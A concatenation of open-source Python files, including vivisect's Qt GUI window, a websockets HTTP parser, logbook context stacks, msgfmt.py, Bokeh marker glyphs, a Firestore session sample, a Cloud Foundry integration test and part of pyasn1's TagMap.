self.vw.vprint('Use View->Layouts->Load and select vivisect/qt/default.lyt')
fname = os.path.basename(self.vw.getMeta('StorageName', 'Unknown'))
self.setWindowTitle('Vivisect: %s' % fname)
self.windowState = QtCore.Qt.WindowNoState
self.addHotKey('ctrl+o', 'file:open')
self.addHotKeyTarget('file:open', self._menuFileOpen)
self.addHotKey('ctrl+s', 'file:save')
self.addHotKeyTarget('file:save', self._menuFileSave)
self.addHotKey('ctrl+w', 'file:quit')
self.addHotKeyTarget('file:quit', self.close)
def vprint(self, msg, addnl=True):
# ripped and modded from envi/cli.py
self.vw.canvas.write(msg)
if addnl:
self.vw.canvas.write('\n')
def getLocation(self, va):
loctup = self.vw.getLocation(va)
if loctup is None:
self.vw.vprint('Location not found!')
else:
name = loc_type_names.get(loctup[L_LTYPE], 'Unspecified')
self.vw.vprint('\nVA: %s' % hex(loctup[L_VA]))
self.vw.vprint(' Size: %d' % loctup[L_SIZE])
self.vw.vprint(' Type: %s' % name)
self.vw.vprint(' Info: %s' % str(loctup[L_TINFO]))
self.vw.vprint(' Repr: %s' % self.vw.reprLocation(loctup)[:64])
def setVaName(self, va, parent=None):
if parent is None:
parent = self
curname = self.vw.getName(va)
if curname is None:
curname = ''
name, ok = QInputDialog.getText(parent, 'Enter...', 'Name', text=curname)
if ok:
name = str(name)
if self.vw.vaByName(name):
raise Exception('Duplicate Name: %s' % name)
self.vw.makeName(va, name)
def setVaComment(self, va, parent=None):
if parent is None:
parent = self
curcomment = self.vw.getComment(va)
if curcomment is None:
curcomment = ''
comment, ok = QInputDialog.getText(parent, 'Enter...', 'Comment', text=curcomment)
if ok:
self.vw.setComment(va, str(comment))
def addVaXref(self, va, parent=None):
if parent is None:
parent = self
xtova, ok = QInputDialog.getText(parent, 'Enter...', 'Make Code Xref 0x%x -> ' % va)
if ok:
try:
val = self.vw.parseExpression(str(xtova))
if self.vw.isValidPointer(val):
self.vw.addXref(va, val, REF_CODE)
else:
self.vw.vprint("Invalid Expression: %s (%s)" % (xtova, val))
except Exception as e:
self.vw.vprint(repr(e))
def setFuncLocalName(self, fva, offset, atype, aname):
newname, ok = QInputDialog.getText(self, 'Enter...', 'Local Name')
if ok:
self.vw.setFunctionLocal(fva, offset, LSYM_NAME, (atype, str(newname)))
def setFuncArgName(self, fva, idx, atype, aname):
newname, ok = QInputDialog.getText(self, 'Enter...', 'Argument Name')
if ok:
self.vw.setFunctionArg(fva, idx, atype, str(newname))
def showFuncCallGraph(self, fva):
callview = viv_q_funcviews.FuncCallsView(self.vw)
callview.functionSelected(fva)
callview.show()
self.vqDockWidget(callview, floating=True)
def makeStruct(self, va, parent=None):
if parent is None:
parent = self
sname = vs_qt.selectStructure(self.vw.vsbuilder, parent=parent)
if sname is not None:
self.vw.makeStructure(va, sname)
return sname
def addBookmark(self, va, parent=None):
if parent is None:
parent = self
bname, ok = QInputDialog.getText(parent, 'Enter...', 'Bookmark Name')
if ok:
self.vw.setVaSetRow('Bookmarks', (va, str(bname)))
def _menuEditPrefs(self):
configs = []
configs.append(('Vivisect', self.vw.config.viv))
configs.append(('Vdb', self.vw.config.vdb))
self._cfg_widget = e_q_config.EnviConfigTabs(configs)
self._cfg_widget.show()
def _menuToolsUStructNew(self):
u = viv_q_ustruct.UserStructEditor(self.vw)
w = self.vqDockWidget(u, floating=True)
w.resize(600, 600)
def _menuToolsUStructEdit(self, name=None):
if name is None:
return self.vw.getUserStructNames()
u = viv_q_ustruct.UserStructEditor(self.vw, name=name)
w = self.vqDockWidget(u, floating=True)
w.resize(600, 600)
def _menuToolsVaSets(self, name=None):
if name is None:
return self.vw.getVaSetNames()
view = viv_q_views.VQVivVaSetView(self.vw, self, name)
self.vqDockWidget(view)
def delFunction(self, fva, parent=None):
if parent is None:
parent = self
yn, ok = QInputDialog.getItem(self, 'Delete Function', 'Confirm:', ('No', 'Yes'), 0, False)
if ok and yn == 'Yes':
self.vw.delFunction(fva)
def vqInitDockWidgetClasses(self):
exprloc = e_expr.MemoryExpressionLocals(self.vw, symobj=self.vw)
exprloc['vw'] = self.vw
exprloc['vwqgui'] = self
exprloc['vprint'] = self.vw.vprint
self.vqAddDockWidgetClass(viv_q_views.VQVivExportsView, args=(self.vw, self))
self.vqAddDockWidgetClass(viv_q_views.VQVivFunctionsView, args=(self.vw, self))
self.vqAddDockWidgetClass(viv_q_views.VQVivNamesView, args=(self.vw, self))
self.vqAddDockWidgetClass(viv_q_views.VQVivImportsView, args=(self.vw, self))
self.vqAddDockWidgetClass(viv_q_views.VQVivSegmentsView, args=(self.vw, self))
self.vqAddDockWidgetClass(viv_q_views.VQVivStringsView, args=(self.vw, self))
self.vqAddDockWidgetClass(viv_q_views.VQVivStructsView, args=(self.vw, self))
self.vqAddDockWidgetClass(vq_python.VQPythonView, args=(exprloc, self))
self.vqAddDockWidgetClass(viv_q_memory.VQVivMemoryView, args=(self.vw, self))
self.vqAddDockWidgetClass(viv_q_funcgraph.VQVivFuncgraphView, args=(self.vw, self))
self.vqAddDockWidgetClass(viv_q_symboliks.VivSymbolikFuncPane, args=(self.vw, self))
def vqRestoreGuiSettings(self, settings):
guid = self.vw.getVivGuid()
dwcls = settings.value('%s/DockClasses' % guid)
state = settings.value('%s/DockState' % guid)
geom = settings.value('%s/DockGeometry' % guid)
stub = '%s/' % guid
if compat_isNone(dwcls):
names = list(self.vw.filemeta.keys())
names.sort()
name = '+'.join(names)
dwcls = settings.value('%s/DockClasses' % name)
state = settings.value('%s/DockState' % name)
geom = settings.value('%s/DockGeometry' % name)
stub = '%s/' % name
if compat_isNone(dwcls):
dwcls = settings.value('DockClasses')
state = settings.value('DockState')
geom = settings.value('DockGeometry')
stub = ''
if not compat_isNone(dwcls):
for i, clsname in enumerate(dwcls):
name = 'VQDockWidget%d' % i
try:
tup = self.vqBuildDockWidget(str(clsname), floating=False)
if tup is not None:
d, obj = tup
d.setObjectName(name)
d.vqRestoreState(settings, name, stub)
d.show()
except Exception as e:
self.vw.vprint('Error Building: %s: %s' % (clsname, e))
# Once dock widgets are loaded, we can restoreState
if not compat_isNone(state):
self.restoreState(state)
if not compat_isNone(geom):
self.restoreGeometry(geom)
# Just get all the resize activities done...
vq_main.eatevents()
for w in self.vqGetDockWidgets():
w.show()
return True
def vqSaveGuiSettings(self, settings):
dock_classes = []
guid = self.vw.getVivGuid()
names = list(self.vw.filemeta.keys())
names.sort()
vivname = '+'.join(names)
# Enumerate the current dock windows and set
# their names by their list order...
for i, w in enumerate(self.vqGetDockWidgets()):
widget = w.widget()
dock_classes.append(widget.__class__.__name__)
name = 'VQDockWidget%d' % i
w.setObjectName(name)
w.vqSaveState(settings, '%s/%s' % (guid, name))
w.vqSaveState(settings, '%s/%s' % (vivname, name))
geom = self.saveGeometry()
state = self.saveState()
# first store for this specific workspace
settings.setValue('%s/DockClasses' % guid, dock_classes)
settings.setValue('%s/DockGeometry' % guid, geom)
settings.setValue('%s/DockState' % guid, state)
# next store for this filename
settings.setValue('%s/DockClasses' % vivname, dock_classes)
settings.setValue('%s/DockGeometry' % vivname, geom)
settings.setValue('%s/DockState' % vivname, state)
# don't store the default. that should be saved manually
def vqGetDockWidgetsByName(self, name='viv', firstonly=False):
'''
Get list of DockWidgets matching a given name (default is 'viv').
Returns a list of tuples (window, DockWidget)
If firstonly==True, returns the first tuple, not a list.
'''
out = []
for vqDW in self.vqGetDockWidgets():
w = vqDW.widget()
if hasattr(w, 'getEnviNavName') and w.getEnviNavName() == name:
if firstonly:
return w, vqDW
out.append((w,vqDW))
return out
def _menuToolsDebug(self):
viv_vdbext.runVdb(self)
def _menuViewFuncGraph(self):
self.vqBuildDockWidget('VQVivFuncgraphView', area=QtCore.Qt.TopDockWidgetArea)
def _menuViewSymboliks(self):
self.vqBuildDockWidget('VivSymbolikFuncPane', area=QtCore.Qt.TopDockWidgetArea)
def _menuFileOpen(self):
# TODO: Add something to change the workspace storage name,
# and also to list the currently loaded files
# Right now it'll successively create storage files
fname = getOpenFileName(self, 'Open...')
if fname is None or not len(fname):
return
self.vw.vprint('Opening %s' % fname)
self.setWindowTitle('Vivisect: %s' % fname)
self.vw.loadFromFile(str(fname))
self.vw.vprint('Analyzing %s' % fname)
self.vw.analyze()
self.vw.vprint('%s is ready!' % fname)
@vq_main.workthread
def _menuFileSave(self, fullsave=False):
self.vw.vprint('Saving workspace...')
try:
self.vw.saveWorkspace(fullsave=fullsave)
except Exception as e:
self.vw.vprint(str(e))
else:
self.vw.vprint('complete!')
def _menuFileSaveAs(self):
fname = getSaveFileName(self, 'Save As...')
if fname is None or not len(fname):
return
self.vw.setMeta('StorageName', fname)
self._menuFileSave(fullsave=True)
def _menuFileSaveServer(self):
viv_q_remote.saveToServer(self.vw, parent=self)
def _menuViewLayoutsLoad(self):
fname = getOpenFileName(self, 'Load Layout')
if fname is None:
return
settings = QtCore.QSettings(fname, QtCore.QSettings.IniFormat)
self.vqRestoreGuiSettings(settings)
def _menuViewLayoutsSave(self):
fname = getSaveFileName(self, 'Save Layout')
if fname is None or not len(fname):
return
settings = QtCore.QSettings(fname, QtCore.QSettings.IniFormat)
self.vqSaveGuiSettings(settings)
def _menuViewLayoutsSetDefault(self):
vq_app.VQMainCmdWindow.vqSaveGuiSettings(self, self._vq_settings)
def _menuToolsStructNames(self):
nsinfo = vs_qt.selectStructNamespace()
if nsinfo is not None:
nsname, modname = nsinfo
self.vw.vprint('Adding struct namespace: %s' % nsname)
self.vw.addStructureModule(nsname, modname)
def _menuShareWorkspace(self):
self.vw.vprint('Sharing workspace...')
daemon = viv_share.shareWorkspace(self.vw)
self.vw.vprint('Workspace Listening Port: %d' % daemon.port)
self.vw.vprint('Clients may now connect to your host on port %d' % daemon.port)
def _menuShareConnect(self):
viv_q_remote.openSharedWorkspace(self.vw, parent=self)
def _menuShareConnectServer(self):
viv_q_remote.openServerAndWorkspace(self.vw, parent=self)
def _menuToolsPython(self):
self.vqBuildDockWidget('VQPythonView', area=QtCore.Qt.RightDockWidgetArea)
def _menuViewStrings(self):
self.vqBuildDockWidget('VQVivStringsView', area=QtCore.Qt.RightDockWidgetArea)
def _menuViewStructs(self):
self.vqBuildDockWidget('VQVivStructsView', area=QtCore.Qt.RightDockWidgetArea)
def _menuViewSegments(self):
self.vqBuildDockWidget('VQVivSegmentsView', area=QtCore.Qt.RightDockWidgetArea)
def _menuViewImports(self):
self.vqBuildDockWidget('VQVivImportsView', area=QtCore.Qt.RightDockWidgetArea)
def _menuViewExports(self):
self.vqBuildDockWidget('VQVivExportsView', area=QtCore.Qt.RightDockWidgetArea)
def _menuViewFunctions(self):
self.vqBuildDockWidget('VQVivFunctionsView', area=QtCore.Qt.RightDockWidgetArea)
def _menuViewNames(self):
self.vqBuildDockWidget('VQVivNamesView', area=QtCore.Qt.RightDockWidgetArea)
def _menuViewMemory(self):
self.vqBuildDockWidget('VQVivMemoryView', area=QtCore.Qt.TopDockWidgetArea)
def _menuWindowFullscreen(self):
if not self.windowState & QtCore.Qt.WindowFullScreen:
self.windowState = QtCore.Qt.WindowFullScreen
self.showFullScreen()
else:
self._menuWindowNormal()
def _menuWindowMaximize(self):
if not self.windowState & QtCore.Qt.WindowMaximized:
self.windowState = QtCore.Qt.WindowMaximized
self.showMaximized()
def _menuWindowNormal(self):
if not self.windowState & QtCore.Qt.WindowNoState:
self.windowState = QtCore.Qt.WindowNoState
self.showNormal()
@vq_main.idlethread
def _ve_fireEvent(self, event, edata):
return viv_base.VivEventDist._ve_fireEvent(self, event, edata)
@vq_main.idlethread
def runqt(vw, closeme=None):
'''
Use this API to instantiate a QT main window and show it when
there is already a main thread running...
'''
mw = VQVivMainWindow(vw)
viv_extensions.loadExtensions(vw, mw)
mw.show()
if closeme:
closeme.close()
return mw
def main(vw):
vq_main.startup(css=vq_colors.qt_matrix)
mw = VQVivMainWindow(vw)
viv_extensions.loadExtensions(vw, mw)
mw.show()
vq_main.main()
if __name__ == '__main__':
vw = viv_cli.VivCli()
if len(sys.argv) == 2:
vw.loadWorkspace(sys.argv[1])
main(vw)
| apache-2.0 |
tashaxe/Red-DiscordBot | lib/websockets/http.py | 8 | 2888 | """
The :mod:`websockets.http` module provides HTTP parsing functions. They're
merely adequate for the WebSocket handshake messages.
These functions cannot be imported from :mod:`websockets`; they must be
imported from :mod:`websockets.http`.
"""
import asyncio
import email.parser
import io
import sys
from .version import version as websockets_version
__all__ = ['read_request', 'read_response', 'USER_AGENT']
MAX_HEADERS = 256
MAX_LINE = 4096
USER_AGENT = ' '.join((
'Python/{}'.format(sys.version[:3]),
'websockets/{}'.format(websockets_version),
))
@asyncio.coroutine
def read_request(stream):
"""
Read an HTTP/1.1 request from ``stream``.
Return ``(path, headers)`` where ``path`` is a :class:`str` and
``headers`` is a :class:`~email.message.Message`. ``path`` isn't
URL-decoded.
Raise an exception if the request isn't well formatted.
The request is assumed not to contain a body.
"""
request_line, headers = yield from read_message(stream)
method, path, version = request_line[:-2].decode().split(None, 2)
if method != 'GET':
raise ValueError("Unsupported method")
if version != 'HTTP/1.1':
raise ValueError("Unsupported HTTP version")
return path, headers
@asyncio.coroutine
def read_response(stream):
"""
Read an HTTP/1.1 response from ``stream``.
Return ``(status, headers)`` where ``status`` is a :class:`int` and
``headers`` is a :class:`~email.message.Message`.
Raise an exception if the request isn't well formatted.
The response is assumed not to contain a body.
"""
status_line, headers = yield from read_message(stream)
version, status, reason = status_line[:-2].decode().split(" ", 2)
if version != 'HTTP/1.1':
raise ValueError("Unsupported HTTP version")
return int(status), headers
@asyncio.coroutine
def read_message(stream):
"""
Read an HTTP message from ``stream``.
Return ``(start_line, headers)`` where ``start_line`` is :class:`bytes`
and ``headers`` is a :class:`~email.message.Message`.
The message is assumed not to contain a body.
"""
start_line = yield from read_line(stream)
header_lines = io.BytesIO()
for num in range(MAX_HEADERS):
header_line = yield from read_line(stream)
header_lines.write(header_line)
if header_line == b'\r\n':
break
else:
raise ValueError("Too many headers")
header_lines.seek(0)
headers = email.parser.BytesHeaderParser().parse(header_lines)
return start_line, headers
@asyncio.coroutine
def read_line(stream):
"""
Read a single line from ``stream``.
"""
line = yield from stream.readline()
if len(line) > MAX_LINE:
raise ValueError("Line too long")
if not line.endswith(b'\r\n'):
raise ValueError("Line without CRLF")
return line
| gpl-3.0 |
zacharyvoase/logbook | logbook/_fallback.py | 11 | 4596 | # -*- coding: utf-8 -*-
"""
logbook._fallback
~~~~~~~~~~~~~~~~~
Fallback implementations in case speedups is not around.
:copyright: (c) 2010 by Armin Ronacher, Georg Brandl.
:license: BSD, see LICENSE for more details.
"""
import threading
from itertools import count
from thread import get_ident as current_thread
_missing = object()
_MAX_CONTEXT_OBJECT_CACHE = 256
def group_reflected_property(name, default, fallback=_missing):
"""Returns a property for a given name that falls back to the
value of the group if set. If there is no such group, the
provided default is used.
"""
def _get(self):
rv = getattr(self, '_' + name, _missing)
if rv is not _missing and rv != fallback:
return rv
if self.group is None:
return default
return getattr(self.group, name)
def _set(self, value):
setattr(self, '_' + name, value)
def _del(self):
delattr(self, '_' + name)
return property(_get, _set, _del)
class _StackBound(object):
def __init__(self, obj, push, pop):
self.__obj = obj
self.__push = push
self.__pop = pop
def __enter__(self):
self.__push()
return self.__obj
def __exit__(self, exc_type, exc_value, tb):
self.__pop()
class StackedObject(object):
"""Baseclass for all objects that provide stack manipulation
operations.
"""
def push_thread(self):
"""Pushes the stacked object to the thread stack."""
raise NotImplementedError()
def pop_thread(self):
"""Pops the stacked object from the thread stack."""
raise NotImplementedError()
def push_application(self):
"""Pushes the stacked object to the application stack."""
raise NotImplementedError()
def pop_application(self):
"""Pops the stacked object from the application stack."""
raise NotImplementedError()
def __enter__(self):
self.push_thread()
return self
def __exit__(self, exc_type, exc_value, tb):
self.pop_thread()
def threadbound(self, _cls=_StackBound):
"""Can be used in combination with the `with` statement to
execute code while the object is bound to the thread.
"""
return _cls(self, self.push_thread, self.pop_thread)
def applicationbound(self, _cls=_StackBound):
"""Can be used in combination with the `with` statement to
execute code while the object is bound to the application.
"""
return _cls(self, self.push_application, self.pop_application)
class ContextStackManager(object):
"""Helper class for context objects that manages a stack of
objects.
"""
def __init__(self):
self._global = []
self._context_lock = threading.Lock()
self._context = threading.local()
self._cache = {}
self._stackop = count().next
def iter_context_objects(self):
"""Returns an iterator over all objects for the combined
application and context cache.
"""
tid = current_thread()
objects = self._cache.get(tid)
if objects is None:
if len(self._cache) > _MAX_CONTEXT_OBJECT_CACHE:
self._cache.clear()
objects = self._global[:]
objects.extend(getattr(self._context, 'stack', ()))
objects.sort(reverse=True)
objects = [x[1] for x in objects]
self._cache[tid] = objects
return iter(objects)
def push_thread(self, obj):
self._context_lock.acquire()
try:
self._cache.pop(current_thread(), None)
item = (self._stackop(), obj)
stack = getattr(self._context, 'stack', None)
if stack is None:
self._context.stack = [item]
else:
stack.append(item)
finally:
self._context_lock.release()
def pop_thread(self):
self._context_lock.acquire()
try:
self._cache.pop(current_thread(), None)
stack = getattr(self._context, 'stack', None)
assert stack, 'no objects on stack'
return stack.pop()[1]
finally:
self._context_lock.release()
def push_application(self, obj):
self._global.append((self._stackop(), obj))
self._cache.clear()
def pop_application(self):
assert self._global, 'no objects on application stack'
popped = self._global.pop()[1]
self._cache.clear()
return popped
| bsd-3-clause |
Belxjander/Kirito | Python-3.5.0-main/Tools/i18n/msgfmt.py | 59 | 7033 | #! /usr/bin/env python3
# Written by Martin v. Löwis <loewis@informatik.hu-berlin.de>
"""Generate binary message catalog from textual translation description.
This program converts a textual Uniforum-style message catalog (.po file) into
a binary GNU catalog (.mo file). This is essentially the same function as the
GNU msgfmt program, however, it is a simpler implementation.
Usage: msgfmt.py [OPTIONS] filename.po
Options:
-o file
--output-file=file
Specify the output file to write to. If omitted, output will go to a
file named filename.mo (based off the input file name).
-h
--help
Print this message and exit.
-V
--version
Display version information and exit.
"""
import os
import sys
import ast
import getopt
import struct
import array
from email.parser import HeaderParser
__version__ = "1.1"
MESSAGES = {}
def usage(code, msg=''):
print(__doc__, file=sys.stderr)
if msg:
print(msg, file=sys.stderr)
sys.exit(code)
def add(id, str, fuzzy):
"Add a non-fuzzy translation to the dictionary."
global MESSAGES
if not fuzzy and str:
MESSAGES[id] = str
def generate():
"Return the generated output."
global MESSAGES
# the keys are sorted in the .mo file
keys = sorted(MESSAGES.keys())
offsets = []
ids = strs = b''
for id in keys:
# For each string, we need size and file offset. Each string is NUL
# terminated; the NUL does not count into the size.
offsets.append((len(ids), len(id), len(strs), len(MESSAGES[id])))
ids += id + b'\0'
strs += MESSAGES[id] + b'\0'
output = ''
# The header is 7 32-bit unsigned integers. We don't use hash tables, so
# the keys start right after the index tables.
# translated string.
keystart = 7*4+16*len(keys)
# and the values start after the keys
valuestart = keystart + len(ids)
koffsets = []
voffsets = []
# The string table first has the list of keys, then the list of values.
# Each entry has first the size of the string, then the file offset.
for o1, l1, o2, l2 in offsets:
koffsets += [l1, o1+keystart]
voffsets += [l2, o2+valuestart]
offsets = koffsets + voffsets
output = struct.pack("Iiiiiii",
0x950412de, # Magic
0, # Version
len(keys), # # of entries
7*4, # start of key index
7*4+len(keys)*8, # start of value index
0, 0) # size and offset of hash table
output += array.array("i", offsets).tostring()
output += ids
output += strs
return output
def make(filename, outfile):
ID = 1
STR = 2
# Compute .mo name from .po name and arguments
if filename.endswith('.po'):
infile = filename
else:
infile = filename + '.po'
if outfile is None:
outfile = os.path.splitext(infile)[0] + '.mo'
try:
lines = open(infile, 'rb').readlines()
except IOError as msg:
print(msg, file=sys.stderr)
sys.exit(1)
section = None
fuzzy = 0
# Start off assuming Latin-1, so everything decodes without failure,
# until we know the exact encoding
encoding = 'latin-1'
# Parse the catalog
lno = 0
for l in lines:
l = l.decode(encoding)
lno += 1
# If we get a comment line after a msgstr, this is a new entry
if l[0] == '#' and section == STR:
add(msgid, msgstr, fuzzy)
section = None
fuzzy = 0
# Record a fuzzy mark
if l[:2] == '#,' and 'fuzzy' in l:
fuzzy = 1
# Skip comments
if l[0] == '#':
continue
# Now we are in a msgid section, output previous section
if l.startswith('msgid') and not l.startswith('msgid_plural'):
if section == STR:
add(msgid, msgstr, fuzzy)
if not msgid:
# See whether there is an encoding declaration
p = HeaderParser()
charset = p.parsestr(msgstr.decode(encoding)).get_content_charset()
if charset:
encoding = charset
section = ID
l = l[5:]
msgid = msgstr = b''
is_plural = False
# This is a message with plural forms
elif l.startswith('msgid_plural'):
if section != ID:
print('msgid_plural not preceded by msgid on %s:%d' % (infile, lno),
file=sys.stderr)
sys.exit(1)
l = l[12:]
msgid += b'\0' # separator of singular and plural
is_plural = True
# Now we are in a msgstr section
elif l.startswith('msgstr'):
section = STR
if l.startswith('msgstr['):
if not is_plural:
print('plural without msgid_plural on %s:%d' % (infile, lno),
file=sys.stderr)
sys.exit(1)
l = l.split(']', 1)[1]
if msgstr:
msgstr += b'\0' # Separator of the various plural forms
else:
if is_plural:
print('indexed msgstr required for plural on %s:%d' % (infile, lno),
file=sys.stderr)
sys.exit(1)
l = l[6:]
# Skip empty lines
l = l.strip()
if not l:
continue
l = ast.literal_eval(l)
if section == ID:
msgid += l.encode(encoding)
elif section == STR:
msgstr += l.encode(encoding)
else:
print('Syntax error on %s:%d' % (infile, lno), \
'before:', file=sys.stderr)
print(l, file=sys.stderr)
sys.exit(1)
# Add last entry
if section == STR:
add(msgid, msgstr, fuzzy)
# Compute output
output = generate()
try:
open(outfile,"wb").write(output)
except IOError as msg:
print(msg, file=sys.stderr)
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], 'hVo:',
['help', 'version', 'output-file='])
except getopt.error as msg:
usage(1, msg)
outfile = None
# parse options
for opt, arg in opts:
if opt in ('-h', '--help'):
usage(0)
elif opt in ('-V', '--version'):
print("msgfmt.py", __version__)
sys.exit(0)
elif opt in ('-o', '--output-file'):
outfile = arg
# do it
if not args:
print('No input file given', file=sys.stderr)
print("Try `msgfmt --help' for more information.", file=sys.stderr)
return
for filename in args:
make(filename, outfile)
if __name__ == '__main__':
main()
| gpl-3.0 |
roxyboy/bokeh | bokeh/models/markers.py | 33 | 5595 | """ Glyph renderer models for displaying simple scatter-type
markers on Bokeh plots.
"""
from __future__ import absolute_import
from .glyphs import Glyph
from ..enums import enumeration
from ..mixins import FillProps, LineProps
from ..properties import DistanceSpec, Enum, Include, NumberSpec, ScreenDistanceSpec
class Marker(Glyph):
""" Base class for glyphs that are simple markers with line and
fill properties, located at an (x, y) location with a specified
size.
.. note::
For simplicity, all markers have both line and fill properties
declared, however some markers (`Asterisk`, `Cross`, `X`) only
draw lines. For these markers, the fill values are simply
ignored.
"""
x = NumberSpec("x", help="""
The x-axis coordinates for the center of the markers.
""")
y = NumberSpec("y", help="""
The y-axis coordinates for the center of the markers.
""")
size = ScreenDistanceSpec(default=4, help="""
The size (diameter) values for the markers. Interpreted as
"screen space" units by default.
""")
angle = NumberSpec("angle", help="""
The angles to rotate the markers.
""")
line_props = Include(LineProps, use_prefix=False, help="""
The %s values for the markers.
""")
fill_props = Include(FillProps, use_prefix=False, help="""
The %s values for the markers.
""")
class Asterisk(Marker):
""" Render asterisk '*' markers.
Example
-------
.. bokeh-plot:: ../tests/glyphs/Asterisk.py
:source-position: none
*source:* ``tests/glyphs/Asterisk.py``
"""
class Circle(Marker):
""" Render circle markers.
Example
-------
.. bokeh-plot:: ../tests/glyphs/Circle.py
:source-position: none
*source:* ``tests/glyphs/Circle.py``
"""
radius = DistanceSpec("radius", help="""
The radius values for circle markers. Interpreted in
"data space" units by default.
.. note::
Circle markers are slightly unusual in that they support specifying
a radius in addition to a size. Only one of ``radius`` or ``size``
should be given.
.. warning::
Note that ``Circle`` glyphs are always drawn as circles on the screen,
even in cases where the data space aspect ratio is not 1-1. In all
cases where radius or size units are specified as "data", the
"distance" for the radius is measured along the horizontal axis.
If the aspect ratio is very large or small, the drawn circles may
appear much larger or smaller than expected. See :bokeh-issue:`626`
for more information.
""")
radius_dimension = Enum(enumeration('x', 'y'), help="""
What dimension to measure circle radii along.
When the data space aspect ratio is not 1-1, then the size of the drawn
circles depends on what direction is used to measure the "distance" of
the radius. This property allows that direction to be controlled.
""")
class CircleCross(Marker):
""" Render circle markers with a '+' cross through the center.
Example
-------
.. bokeh-plot:: ../tests/glyphs/CircleCross.py
:source-position: none
*source:* ``tests/glyphs/CircleCross.py``
"""
class CircleX(Marker):
""" Render circle markers with an 'X' cross through the center.
Example
-------
.. bokeh-plot:: ../tests/glyphs/CircleX.py
:source-position: none
*source:* ``tests/glyphs/CircleX.py``
"""
class Cross(Marker):
""" Render '+' cross markers.
Example
-------
.. bokeh-plot:: ../tests/glyphs/Cross.py
:source-position: none
*source:* ``tests/glyphs/Cross.py``
"""
class Diamond(Marker):
""" Render diamond markers.
Example
-------
.. bokeh-plot:: ../tests/glyphs/Diamond.py
:source-position: none
*source:* ``tests/glyphs/Diamond.py``
"""
class DiamondCross(Marker):
""" Render diamond markers with a '+' cross through the center.
Example
-------
.. bokeh-plot:: ../tests/glyphs/DiamondCross.py
:source-position: none
*source:* ``tests/glyphs/DiamondCross.py``
"""
class InvertedTriangle(Marker):
""" Render upside-down triangle markers.
Example
-------
.. bokeh-plot:: ../tests/glyphs/InvertedTriangle.py
:source-position: none
*source:* ``tests/glyphs/InvertedTriangle.py``
"""
class Square(Marker):
""" Render a square marker, optionally rotated.
Example
-------
.. bokeh-plot:: ../tests/glyphs/Square.py
:source-position: none
*source:* ``tests/glyphs/Square.py``
"""
class SquareCross(Marker):
""" Render square markers with a '+' cross through the center.
Example
-------
.. bokeh-plot:: ../tests/glyphs/SquareCross.py
:source-position: none
*source:* ``tests/glyphs/SquareCross.py``
"""
class SquareX(Marker):
""" Render square markers with an 'X' cross through the center.
Example
-------
.. bokeh-plot:: ../tests/glyphs/SquareX.py
:source-position: none
*source:* ``tests/glyphs/SquareX.py``
"""
class Triangle(Marker):
""" Render triangle markers.
Example
-------
.. bokeh-plot:: ../tests/glyphs/Triangle.py
:source-position: none
*source:* ``tests/glyphs/Triangle.py``
"""
class X(Marker):
""" Render a 'X' cross markers.
Example
-------
.. bokeh-plot:: ../tests/glyphs/X.py
:source-position: none
*source:* ``tests/glyphs/X.py``
"""
| bsd-3-clause |
GoogleCloudPlatform/training-data-analyst | self-paced-labs/cloud-hero/sessions/main.py | 2 | 2257 | # Copyright 2019 Google LLC All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
from uuid import uuid4
from flask import Flask, make_response, request
from google.cloud import firestore
app = Flask(__name__)
db = firestore.Client()
sessions = db.collection('sessions')
greetings = [
'Hello World',
'Hallo Welt',
'Ciao Mondo',
'Salut le Monde',
'Hola Mundo',
]
@firestore.transactional
def get_session_data(transaction, session_id):
""" Looks up (or creates) the session with the given session_id.
Creates a random session_id if none is provided. Increments
the number of views in this session. Updates are done in a
transaction to make sure no saved increments are overwritten.
"""
if session_id is None:
session_id = str(uuid4()) # Random, unique identifier
doc_ref = sessions.document(document_id=session_id)
doc = doc_ref.get(transaction=transaction)
if doc.exists:
session = doc.to_dict()
else:
session = {
'greeting': random.choice(greetings),
'views': 0
}
session['views'] += 1 # This counts as a view
transaction.set(doc_ref, session)
session['session_id'] = session_id
return session
@app.route('/', methods=['GET'])
def home():
template = '<body>{} views for {}</body>'
transaction = db.transaction()
session = get_session_data(transaction, request.cookies.get('session_id'))
resp = make_response(template.format(
session['views'],
session['greeting']
)
)
resp.set_cookie('session_id', session['session_id'], httponly=True)
return resp
if __name__ == '__main__':
app.run(host='127.0.0.1', port=8080)
| apache-2.0 |
antechrestos/cf-python-client | integration/test_navigation.py | 1 | 3323 | import logging
import unittest
from config_test import build_client_from_configuration
_logger = logging.getLogger(__name__)
class TestNavigation(unittest.TestCase):
def test_all(self):
client = build_client_from_configuration()
for organization in client.v2.organizations:
if organization['metadata']['guid'] == client.org_guid:
for space in organization.spaces():
if space['metadata']['guid'] == client.space_guid:
organization_reloaded = space.organization()
self.assertEqual(organization['metadata']['guid'], organization_reloaded['metadata']['guid'])
for application in space.apps():
if application['metadata']['guid'] == client.app_guid:
space_reloaded = application.space()
self.assertEqual(space['metadata']['guid'], space_reloaded['metadata']['guid'])
application.start()
application.stats()
application.instances()
application.summary()
for _ in application.routes():
break
for _ in application.service_bindings():
break
for _ in application.events():
break
application.stop()
for service_instance in space.service_instances():
space_reloaded = service_instance.space()
self.assertEqual(space['metadata']['guid'], space_reloaded['metadata']['guid'])
for service_binding in service_instance.service_bindings():
service_instance_reloaded = service_binding.service_instance()
self.assertEqual(service_instance['metadata']['guid'],
service_instance_reloaded['metadata']['guid'])
service_binding.app()
break
for route in service_instance.routes():
service_instance_reloaded = route.service_instance()
self.assertEqual(service_instance['metadata']['guid'],
service_instance_reloaded['metadata']['guid'])
for _ in route.apps():
break
space_reloaded = route.space()
self.assertEqual(space['metadata']['guid'], space_reloaded['metadata']['guid'])
break
service_plan = service_instance.service_plan()
for _ in service_plan.service_instances():
break
service = service_plan.service()
for _ in service.service_plans():
break
break
| apache-2.0 |
jymannob/CouchPotatoServer | libs/pyasn1/type/tagmap.py | 200 | 1772 | from pyasn1 import error
class TagMap:
def __init__(self, posMap={}, negMap={}, defType=None):
self.__posMap = posMap.copy()
self.__negMap = negMap.copy()
self.__defType = defType
def __contains__(self, tagSet):
return tagSet in self.__posMap or \
self.__defType is not None and tagSet not in self.__negMap
